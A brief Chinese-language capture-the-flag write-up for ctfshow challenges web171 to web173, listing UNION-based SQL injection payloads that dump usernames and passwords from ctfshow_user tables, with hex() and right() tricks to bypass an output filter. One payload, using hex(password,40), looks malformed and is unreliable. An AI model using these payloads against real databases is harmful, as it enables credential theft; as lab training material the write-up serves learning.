文章目录
- web171
- web172
- web173
- 方法一
- 方法二
web171
普通的sql注入,不做讲解
payload:1' union select id,username,password from ctfshow_user1 -- -
web172
普通的sql注入,不做讲解
payload:1' union select id,username,password from ctfshow_user2 -- -
web173
方法一
过滤了带有flag
的输出,可以转换为16进制输出
1' union select id,hex(username),hex(password,40) from ctfshow_user3 -- -
方法二
用right
函数
1' union select id,hex(username),right(password,40) from ctfshow_user3 -- -